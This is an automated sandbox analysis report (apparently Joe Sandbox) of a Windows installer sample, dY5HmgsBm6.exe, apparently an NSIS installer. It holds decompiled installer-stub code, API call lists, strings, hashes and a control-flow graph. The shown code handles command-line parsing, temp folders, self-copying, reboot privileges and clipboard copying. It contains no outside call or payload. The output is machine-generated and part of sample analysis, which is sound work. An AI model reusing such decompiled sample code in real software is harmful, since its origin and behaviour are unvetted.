                                                        				_t55 = CharNextA(E00405ABA(_t53,  *(_t163 + 0x14)));
                                                        				 *(_t163 + 0x1c) = _t55;
                                                        				while(1) {
                                                        					_t121 =  *_t55;
                                                        					_t171 = _t121;
                                                        					if(_t121 == 0) {
                                                        						break;
                                                        					}
                                                        					__eflags = _t121 - 0x20;
                                                        					if(_t121 != 0x20) {
                                                        						L13:
                                                        						__eflags =  *_t55 - 0x22;
                                                        						 *(_t163 + 0x14) = 0x20;
                                                        						if( *_t55 == 0x22) {
                                                        							_t55 =  &(_t55[1]);
                                                        							__eflags = _t55;
                                                        							 *(_t163 + 0x14) = 0x22;
                                                        						}
                                                        						__eflags =  *_t55 - 0x2f;
                                                        						if( *_t55 != 0x2f) {
                                                        							L25:
                                                        							_t55 = E00405ABA(_t55,  *(_t163 + 0x14));
                                                        							__eflags =  *_t55 - 0x22;
                                                        							if(__eflags == 0) {
                                                        								_t55 =  &(_t55[1]);
                                                        								__eflags = _t55;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t55 =  &(_t55[1]);
                                                        							__eflags =  *_t55 - 0x53;
                                                        							if( *_t55 != 0x53) {
                                                        								L20:
                                                        								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                        								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                        									L24:
                                                        									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                        									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                        										 *((char*)(_t55 - 2)) = 0;
                                                        										__eflags =  &(_t55[2]);
                                                        										E004060F7("C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel",  &(_t55[2]));
                                                        										L30:
                                                        										_t156 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                                                        										GetTempPathA(0x400, _t156);
                                                        										_t59 = E00403317(_t171);
                                                        										_t172 = _t59;
                                                        										if(_t59 != 0) {
                                                        											L33:
                                                        											DeleteFileA("1033"); // executed
                                                        											_t61 = E00402EA1(_t174,  *(_t163 + 0x20)); // executed
                                                        											 *((intOrPtr*)(_t163 + 0x10)) = _t61;
                                                        											if(_t61 != 0) {
                                                        												L43:
                                                        												ExitProcess(); // executed
                                                        												__imp__OleUninitialize(); // executed
                                                        												_t184 =  *((intOrPtr*)(_t163 + 0x10));
                                                        												if( *((intOrPtr*)(_t163 + 0x10)) == 0) {
                                                        													__eflags =  *0x42f4d4;
                                                        													if( *0x42f4d4 == 0) {
                                                        														L67:
                                                        														_t62 =  *0x42f4ec;
                                                        														__eflags = _t62 - 0xffffffff;
                                                        														if(_t62 != 0xffffffff) {
                                                        															 *(_t163 + 0x14) = _t62;
                                                        														}
                                                        														ExitProcess( *(_t163 + 0x14));
                                                        													}
                                                        													_t65 = OpenProcessToken(GetCurrentProcess(), 0x28, _t163 + 0x18);
                                                        													__eflags = _t65;
                                                        													_t149 = 2;
                                                        													if(_t65 != 0) {
                                                        														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t163 + 0x24);
                                                        														 *(_t163 + 0x38) = 1;
                                                        														 *(_t163 + 0x44) = _t149;
                                                        														AdjustTokenPrivileges( *(_t163 + 0x2c), 0, _t163 + 0x28, 0, 0, 0);
                                                        													}
                                                        													_t66 = E00406500(4);
                                                        													__eflags = _t66;
                                                        													if(_t66 == 0) {
                                                        														L65:
                                                        														_t67 = ExitWindowsEx(_t149, 0x80040002);
                                                        														__eflags = _t67;
                                                        														if(_t67 != 0) {
                                                        															goto L67;
                                                        														}
                                                        														goto L66;
                                                        													} else {
                                                        														_t69 =  *_t66(0, 0, 0, 0x25, 0x80040002);
                                                        														__eflags = _t69;
                                                        														if(_t69 == 0) {
                                                        															L66:
                                                        															E0040140B(9);
                                                        															goto L67;
                                                        														}
                                                        														goto L65;
                                                        													}
                                                        												}
                                                        												E00405813( *((intOrPtr*)(_t163 + 0x10)), 0x200010);
                                                        												ExitProcess(2);
                                                        											}
                                                        											if( *0x42f440 == 0) {
                                                        												L42:
                                                        												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
                                                        												 *(_t163 + 0x18) = E0040390A( *0x42f4ec);
                                                        												goto L43;
                                                        											}
                                                        											_t152 = E00405ABA(_t159, 0);
                                                        											if(_t152 < _t159) {
                                                        												L39:
                                                        												_t181 = _t152 - _t159;
                                                        												 *((intOrPtr*)(_t163 + 0x10)) = "Error launching installer";
                                                        												if(_t152 < _t159) {
                                                        													_t150 = E0040577E(_t184);
                                                        													lstrcatA(_t156, "~nsu");
                                                        													if(_t150 != 0) {
                                                        														lstrcatA(_t156, "A");
                                                        													}
                                                        													lstrcatA(_t156, ".tmp");
                                                        													_t161 = "C:\\Users\\engineer\\Desktop";
                                                        													if(lstrcmpiA(_t156, "C:\\Users\\engineer\\Desktop") != 0) {
                                                        														_push(_t156);
                                                        														if(_t150 == 0) {
                                                        															E00405761();
                                                        														} else {
                                                        															E004056E4();
                                                        														}
                                                        														SetCurrentDirectoryA(_t156);
                                                        														_t188 = "C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel"; // 0x43
                                                        														if(_t188 == 0) {
                                                        															E004060F7("C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel", _t161);
                                                        														}
                                                        														E004060F7(0x430000,  *(_t163 + 0x1c));
                                                        														_t136 = "A";
                                                        														_t162 = 0x1a;
                                                        														 *0x430400 = "A";
                                                        														do {
                                                        															E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
                                                        															DeleteFileA(0x429450);
                                                        															if( *((intOrPtr*)(_t163 + 0x10)) != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\dY5HmgsBm6.exe", 0x429450, 1) != 0) {
                                                        																E00405ED6(_t136, 0x429450, 0);
                                                        																E0040618A(0, 0x429450, _t156, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
                                                        																_t93 = E00405796(0x429450);
                                                        																if(_t93 != 0) {
                                                        																	CloseHandle(_t93);
                                                        																	 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                        																}
                                                        															}
                                                        															 *0x430400 =  *0x430400 + 1;
                                                        															_t162 = _t162 - 1;
                                                        														} while (_t162 != 0);
                                                        														E00405ED6(_t136, _t156, 0);
                                                        													}
                                                        													goto L43;
                                                        												}
                                                        												 *_t152 = 0;
                                                        												_t153 = _t152 + 4;
                                                        												if(E00405B7D(_t181, _t152 + 4) == 0) {
                                                        													goto L43;
                                                        												}
                                                        												E004060F7("C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel", _t153);
                                                        												E004060F7("C:\\Users\\engineer\\AppData\\Roaming\\CachemanControlPanel", _t153);
                                                        												 *((intOrPtr*)(_t163 + 0x10)) = 0;
                                                        												goto L42;
                                                        											}
                                                        											_t109 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
                                                        											while( *_t152 != _t109) {
                                                        												_t152 = _t152 - 1;
                                                        												if(_t152 >= _t159) {
                                                        													continue;
                                                        												}
                                                        												goto L39;
                                                        											}
                                                        											goto L39;
                                                        										}
                                                        										GetWindowsDirectoryA(_t156, 0x3fb);
                                                        										lstrcatA(_t156, "\\Temp");
                                                        										_t112 = E00403317(_t172);
                                                        										_t173 = _t112;
                                                        										if(_t112 != 0) {
                                                        											goto L33;
                                                        										}
                                                        										GetTempPathA(0x3fc, _t156);
                                                        										lstrcatA(_t156, "Low");
                                                        										SetEnvironmentVariableA("TEMP", _t156);
                                                        										SetEnvironmentVariableA("TMP", _t156);
                                                        										_t117 = E00403317(_t173);
                                                        										_t174 = _t117;
                                                        										if(_t117 == 0) {
                                                        											goto L43;
                                                        										}
                                                        										goto L33;
                                                        									}
                                                        									goto L25;
                                                        								}
                                                        								_t140 = _t55[4];
                                                        								__eflags = _t140 - 0x20;
                                                        								if(_t140 == 0x20) {
                                                        									L23:
                                                        									_t15 = _t163 + 0x20;
                                                        									 *_t15 =  *(_t163 + 0x20) | 0x00000004;
                                                        									__eflags =  *_t15;
                                                        									goto L24;
                                                        								}
                                                        								__eflags = _t140;
                                                        								if(_t140 != 0) {
                                                        									goto L24;
                                                        								}
                                                        								goto L23;
                                                        							}
                                                        							_t141 = _t55[1];
                                                        							__eflags = _t141 - 0x20;
                                                        							if(_t141 == 0x20) {
                                                        								L19:
                                                        								 *0x42f4e0 = 1;
                                                        								goto L20;
                                                        							}
                                                        							__eflags = _t141;
                                                        							if(_t141 != 0) {
                                                        								goto L20;
                                                        							}
                                                        							goto L19;
                                                        						}
                                                        					} else {
                                                        						goto L12;
                                                        					}
                                                        					do {
                                                        						L12:
                                                        						_t55 =  &(_t55[1]);
                                                        						__eflags =  *_t55 - 0x20;
                                                        					} while ( *_t55 == 0x20);
                                                        					goto L13;
                                                        				}
                                                        				goto L30;
                                                        			}

































                                                        0x00403358
                                                        0x0040335c
                                                        0x00403364
                                                        0x00403368
                                                        0x0040336d
                                                        0x00403379
                                                        0x00403382
                                                        0x00403387
                                                        0x0040338a
                                                        0x00403391
                                                        0x00403398
                                                        0x00403398
                                                        0x00403391
                                                        0x0040339a
                                                        0x0040339f
                                                        0x004033a0
                                                        0x004033ac
                                                        0x004033b0
                                                        0x004033b6
                                                        0x004033c4
                                                        0x004033c9
                                                        0x004033d0
                                                        0x004033d4
                                                        0x004033d8
                                                        0x004033da
                                                        0x004033da
                                                        0x004033d8
                                                        0x004033e2
                                                        0x004033e9
                                                        0x004033ef
                                                        0x00403405
                                                        0x00403415
                                                        0x0040341a
                                                        0x00403420
                                                        0x00403427
                                                        0x00403433
                                                        0x0040343d
                                                        0x0040343f
                                                        0x00403441
                                                        0x00403446
                                                        0x00403446
                                                        0x00403456
                                                        0x0040345c
                                                        0x00403525
                                                        0x00403525
                                                        0x00403527
                                                        0x00403529
                                                        0x00000000
                                                        0x00000000
                                                        0x00403465
                                                        0x00403468
                                                        0x00403470
                                                        0x00403470
                                                        0x00403473
                                                        0x00403478
                                                        0x0040347a
                                                        0x0040347a
                                                        0x0040347b
                                                        0x0040347b
                                                        0x00403480
                                                        0x00403483
                                                        0x00403515
                                                        0x0040351a
                                                        0x0040351f
                                                        0x00403522
                                                        0x00403524
                                                        0x00403524
                                                        0x00403524
                                                        0x00000000
                                                        0x00403489
                                                        0x00403489
                                                        0x0040348a
                                                        0x0040348d
                                                        0x004034a5
                                                        0x004034d0
                                                        0x004034d2
                                                        0x004034e5
                                                        0x00403510
                                                        0x00403513
                                                        0x00403531
                                                        0x00403534
                                                        0x0040353d
                                                        0x00403542
                                                        0x00403548
                                                        0x00403553
                                                        0x00403555
                                                        0x0040355a
                                                        0x0040355c
                                                        0x004035b4
                                                        0x004035b9
                                                        0x004035c3
                                                        0x004035ca
                                                        0x004035ce
                                                        0x00403662
                                                        0x00403662
                                                        0x00403667
                                                        0x0040366d
                                                        0x00403672
                                                        0x00403796
                                                        0x0040379c
                                                        0x00403818
                                                        0x00403818
                                                        0x0040381d
                                                        0x00403820
                                                        0x00403822
                                                        0x00403822
                                                        0x0040382a
                                                        0x0040382a
                                                        0x004037ac
                                                        0x004037b4
                                                        0x004037b6
                                                        0x004037b7
                                                        0x004037c4
                                                        0x004037d7
                                                        0x004037df
                                                        0x004037e3
                                                        0x004037e3
                                                        0x004037eb
                                                        0x004037f0
                                                        0x004037f7
                                                        0x00403805
                                                        0x00403807
                                                        0x0040380d
                                                        0x0040380f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004037f9
                                                        0x004037ff
                                                        0x00403801
                                                        0x00403803
                                                        0x00403811
                                                        0x00403813
                                                        0x00000000
                                                        0x00403813
                                                        0x00000000
                                                        0x00403803
                                                        0x004037f7
                                                        0x00403681
                                                        0x00403688
                                                        0x00403688
                                                        0x004035da
                                                        0x00403652
                                                        0x00403652
                                                        0x0040365e
                                                        0x00000000
                                                        0x0040365e
                                                        0x004035e3
                                                        0x004035e7
                                                        0x0040361d
                                                        0x0040361d
                                                        0x0040361f
                                                        0x00403627
                                                        0x00403699
                                                        0x0040369b
                                                        0x004036a2
                                                        0x004036aa
                                                        0x004036aa
                                                        0x004036b5
                                                        0x004036ba
                                                        0x004036c9
                                                        0x004036cd
                                                        0x004036ce
                                                        0x004036d7
                                                        0x004036d0
                                                        0x004036d0
                                                        0x004036d0
                                                        0x004036dd
                                                        0x004036e3
                                                        0x004036e9
                                                        0x004036f1
                                                        0x004036f1
                                                        0x004036ff
                                                        0x00403704
                                                        0x00403716
                                                        0x0040371e
                                                        0x00403724
                                                        0x00403730
                                                        0x00403736
                                                        0x00403740
                                                        0x00403756
                                                        0x00403767
                                                        0x0040376d
                                                        0x00403774
                                                        0x00403777
                                                        0x0040377d
                                                        0x0040377d
                                                        0x00403774
                                                        0x00403781
                                                        0x00403787
                                                        0x00403787
                                                        0x0040378c
                                                        0x0040378c
                                                        0x00000000
                                                        0x004036c9
                                                        0x00403629
                                                        0x0040362b
                                                        0x00403636
                                                        0x00000000
                                                        0x00000000
                                                        0x0040363e
                                                        0x00403649
                                                        0x0040364e
                                                        0x00000000
                                                        0x0040364e
                                                        0x00403612
                                                        0x00403614
                                                        0x00403618
                                                        0x0040361b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040361b
                                                        0x00000000
                                                        0x00403614
                                                        0x00403564
                                                        0x00403570
                                                        0x00403575
                                                        0x0040357a
                                                        0x0040357c
                                                        0x00000000
                                                        0x00000000
                                                        0x00403584
                                                        0x0040358c
                                                        0x0040359d
                                                        0x004035a5
                                                        0x004035a7
                                                        0x004035ac
                                                        0x004035ae
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004035ae
                                                        0x00000000
                                                        0x00403513
                                                        0x004034d4
                                                        0x004034d7
                                                        0x004034da
                                                        0x004034e0
                                                        0x004034e0
                                                        0x004034e0
                                                        0x004034e0
                                                        0x00000000
                                                        0x004034e0
                                                        0x004034dc
                                                        0x004034de
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004034de
                                                        0x0040348f
                                                        0x00403492
                                                        0x00403495
                                                        0x0040349b
                                                        0x0040349b
                                                        0x00000000
                                                        0x0040349b
                                                        0x00403497
                                                        0x00403499
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403499
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040346a
                                                        0x0040346a
                                                        0x0040346a
                                                        0x0040346b
                                                        0x0040346b
                                                        0x00000000
                                                        0x0040346a
                                                        0x00000000

                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 0040336D
                                                        • GetVersion.KERNEL32 ref: 00403373
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                        • OleInitialize.OLE32(00000000), ref: 004033E9
                                                        • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                        • GetCommandLineA.KERNEL32(Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\dY5HmgsBm6.exe" ,00000020,"C:\Users\user\Desktop\dY5HmgsBm6.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                          • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                          • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                          • Part of subcall function 0040390A: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\CachemanControlPanel,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000,00000002,747DFA90), ref: 004039FA
                                                          • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\CachemanControlPanel,1033,Name Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Name Setup: Completed,00000000), ref: 00403A0D
                                                          • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(: Completed), ref: 00403A18
                                                          • Part of subcall function 0040390A: LoadImageA.USER32 ref: 00403A61
                                                          • Part of subcall function 0040390A: RegisterClassA.USER32 ref: 00403A9E
                                                        • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662
                                                          • Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                        • ExitProcess.KERNEL32 ref: 00403688
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                        • ExitProcess.KERNEL32 ref: 0040382A
                                                          • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.326832867.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000001.00000002.326827711.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326840130.0000000000408000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326848331.000000000040A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326867979.000000000042C000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326880204.0000000000435000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000001.00000002.326888105.0000000000438000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_400000_dY5HmgsBm6.jbxd
                                                        Similarity
                                                        • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                        • String ID: "$"C:\Users\user\Desktop\dY5HmgsBm6.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\CachemanControlPanel$C:\Users\user\AppData\Roaming\CachemanControlPanel$C:\Users\user\Desktop$C:\Users\user\Desktop\dY5HmgsBm6.exe$Error launching installer$Low$NSIS Error$Name Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                        • API String ID: 562314493-262210370
                                                        • Opcode ID: 1696fd18bf7af8dd94241a8e5af2d50579e181fcbe0ccea8defda79c6d91920a
                                                        • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                        • Opcode Fuzzy Hash: 1696fd18bf7af8dd94241a8e5af2d50579e181fcbe0ccea8defda79c6d91920a
                                                        • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 132 40535c-405378 133 405507-40550d 132->133 134 40537e-405445 GetDlgItem * 3 call 4041b0 call 404aa1 GetClientRect GetSystemMetrics SendMessageA * 2 132->134 136 405537-405543 133->136 137 40550f-405531 GetDlgItem CreateThread FindCloseChangeNotification 133->137 156 405463-405466 134->156 157 405447-405461 SendMessageA * 2 134->157 139 405565-40556b 136->139 140 405545-40554b 136->140 137->136 144 4055c0-4055c3 139->144 145 40556d-405573 139->145 142 405586-40558d call 4041e2 140->142 143 40554d-405560 ShowWindow * 2 call 4041b0 140->143 153 405592-405596 142->153 143->139 144->142 150 4055c5-4055cb 144->150 146 405575-405581 call 404154 145->146 147 405599-4055a9 ShowWindow 145->147 146->142 154 4055b9-4055bb call 404154 147->154 155 4055ab-4055b4 call 40521e 147->155 150->142 158 4055cd-4055e0 SendMessageA 150->158 154->144 155->154 161 405476-40548d call 40417b 156->161 162 405468-405474 SendMessageA 156->162 157->156 163 4055e6-405612 CreatePopupMenu call 40618a AppendMenuA 158->163 164 4056dd-4056df 158->164 171 4054c3-4054e4 GetDlgItem SendMessageA 161->171 172 40548f-4054a3 ShowWindow 161->172 162->161 169 405614-405624 GetWindowRect 163->169 170 405627-40563d TrackPopupMenu 163->170 164->153 169->170 170->164 173 405643-40565d 170->173 171->164 176 4054ea-405502 SendMessageA * 2 171->176 174 4054b2 172->174 175 4054a5-4054b0 ShowWindow 172->175 177 405662-40567d SendMessageA 173->177 178 4054b8-4054be call 4041b0 174->178 175->178 176->164 177->177 179 40567f-40569f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 177->179 178->171 181 4056a1-4056c1 SendMessageA 179->181 181->181 182 4056c3-4056d7 GlobalUnlock SetClipboardData CloseClipboard 181->182 182->164
                                                        C-Code - Quality: 96%
                                                        			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                        				struct HWND__* _v8;
                                                        				struct tagRECT _v24;
                                                        				void* _v32;
                                                        				signed int _v36;
                                                        				int _v40;
                                                        				int _v44;
                                                        				signed int _v48;
                                                        				int _v52;
                                                        				void* _v56;
                                                        				void* _v64;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				struct HWND__* _t87;
                                                        				struct HWND__* _t89;
                                                        				long _t90;
                                                        				int _t95;
                                                        				int _t96;
                                                        				long _t99;
                                                        				void* _t102;
                                                        				intOrPtr _t113;
                                                        				void* _t121;
                                                        				intOrPtr _t124;
                                                        				struct HWND__* _t128;
                                                        				int _t150;
                                                        				int _t153;
                                                        				long _t157;
                                                        				struct HWND__* _t161;
                                                        				struct HMENU__* _t163;
                                                        				long _t165;
                                                        				void* _t166;
                                                        				char* _t167;
                                                        				char* _t168;
                                                        				int _t169;
                                                        
                                                        				_t87 =  *0x42ec04; // 0x9005e
                                                        				_t157 = _a8;
                                                        				_t150 = 0;
                                                        				_v8 = _t87;
                                                        				if(_t157 != 0x110) {
                                                        					__eflags = _t157 - 0x405;
                                                        					if(_t157 == 0x405) {
                                                        						_t121 = CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
                                                        						FindCloseChangeNotification(_t121);
                                                        					}
                                                        					__eflags = _t157 - 0x111;
                                                        					if(_t157 != 0x111) {
                                                        						L17:
                                                        						__eflags = _t157 - 0x404;
                                                        						if(_t157 != 0x404) {
                                                        							L25:
                                                        							__eflags = _t157 - 0x7b;
                                                        							if(_t157 != 0x7b) {
                                                        								goto L20;
                                                        							}
                                                        							_t89 = _v8;
                                                        							__eflags = _a12 - _t89;
                                                        							if(_a12 != _t89) {
                                                        								goto L20;
                                                        							}
                                                        							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                        							__eflags = _t90 - _t150;
                                                        							_a12 = _t90;
                                                        							if(_t90 <= _t150) {
                                                        								L36:
                                                        								return 0;
                                                        							}
                                                        							_t163 = CreatePopupMenu();
                                                        							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                        							_t95 = _a16;
                                                        							__eflags = _a16 - 0xffffffff;
                                                        							_t153 = _a16 >> 0x10;
                                                        							if(_a16 == 0xffffffff) {
                                                        								GetWindowRect(_v8,  &_v24);
                                                        								_t95 = _v24.left;
                                                        								_t153 = _v24.top;
                                                        							}
                                                        							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                        							__eflags = _t96 - 1;
                                                        							if(_t96 == 1) {
                                                        								_t165 = 1;
                                                        								__eflags = 1;
                                                        								_v56 = _t150;
                                                        								_v44 = 0x42a890;
                                                        								_v40 = 0x1000;
                                                        								_a4 = _a12;
                                                        								do {
                                                        									_a4 = _a4 - 1;
                                                        									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                        									__eflags = _a4 - _t150;
                                                        									_t165 = _t165 + _t99 + 2;
                                                        								} while (_a4 != _t150);
                                                        								OpenClipboard(_t150);
                                                        								EmptyClipboard();
                                                        								_t102 = GlobalAlloc(0x42, _t165);
                                                        								_a4 = _t102;
                                                        								_t166 = GlobalLock(_t102);
                                                        								do {
                                                        									_v44 = _t166;
                                                        									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                        									 *_t167 = 0xd;
                                                        									_t168 = _t167 + 1;
                                                        									 *_t168 = 0xa;
                                                        									_t166 = _t168 + 1;
                                                        									_t150 = _t150 + 1;
                                                        									__eflags = _t150 - _a12;
                                                        								} while (_t150 < _a12);
                                                        								GlobalUnlock(_a4);
                                                        								SetClipboardData(1, _a4);
                                                        								CloseClipboard();
                                                        							}
                                                        							goto L36;
                                                        						}
                                                        						__eflags =  *0x42ebec - _t150; // 0x0
                                                        						if(__eflags == 0) {
                                                        							ShowWindow( *0x42f428, 8); // executed
                                                        							__eflags =  *0x42f4cc - _t150;
                                                        							if( *0x42f4cc == _t150) {
                                                        								_t113 =  *0x42a068; // 0x68b54c
                                                        								E0040521E( *((intOrPtr*)(_t113 + 0x34)), _t150);
                                                        							}
                                                        							E00404154(1);
                                                        							goto L25;
                                                        						}
                                                        						 *0x429c60 = 2;
                                                        						E00404154(0x78);
                                                        						goto L20;
                                                        					} else {
                                                        						__eflags = _a12 - 0x403;
                                                        						if(_a12 != 0x403) {
                                                        							L20:
                                                        							return E004041E2(_t157, _a12, _a16);
                                                        						}
                                                        						ShowWindow( *0x42ebf0, _t150);
                                                        						ShowWindow(_v8, 8);
                                                        						E004041B0(_v8);
                                                        						goto L17;
                                                        					}
                                                        				}
                                                        				_v48 = _v48 | 0xffffffff;
                                                        				_v36 = _v36 | 0xffffffff;
                                                        				_t169 = 2;
                                                        				_v56 = _t169;
                                                        				_v52 = 0;
                                                        				_v44 = 0;
                                                        				_v40 = 0;
                                                        				asm("stosd");
                                                        				asm("stosd");
                                                        				_t124 =  *0x42f434;
                                                        				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                        				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                        				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                                                        				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                                                        				_t128 = GetDlgItem(_a4, 0x3f8);
                                                        				 *0x42ec04 = _t128;
                                                        				_v8 = _t128;
                                                        				E004041B0( *0x42ebf0);
                                                        				 *0x42ebf4 = E00404AA1(4);
                                                        				 *0x42ec0c = 0;
                                                        				GetClientRect(_v8,  &_v24);
                                                        				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                        				SendMessageA(_v8, 0x101b, 0,  &_v56); // executed
                                                        				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                        				if(_a12 >= 0) {
                                                        					SendMessageA(_v8, 0x1001, 0, _a12);
                                                        					SendMessageA(_v8, 0x1026, 0, _a12);
                                                        				}
                                                        				if(_a8 >= _t150) {
                                                        					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                        				}
                                                        				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                        				_push(0x1b);
                                                        				E0040417B(_a4);
                                                        				if(( *0x42f43c & 0x00000003) != 0) {
                                                        					ShowWindow( *0x42ebf0, _t150);
                                                        					if(( *0x42f43c & 0x00000002) != 0) {
                                                        						 *0x42ebf0 = _t150;
                                                        					} else {
                                                        						ShowWindow(_v8, 8);
                                                        					}
                                                        					E004041B0( *0x42ebe8);
                                                        				}
                                                        				_t161 = GetDlgItem(_a4, 0x3ec);
                                                        				SendMessageA(_t161, 0x401, _t150, 0x75300000);
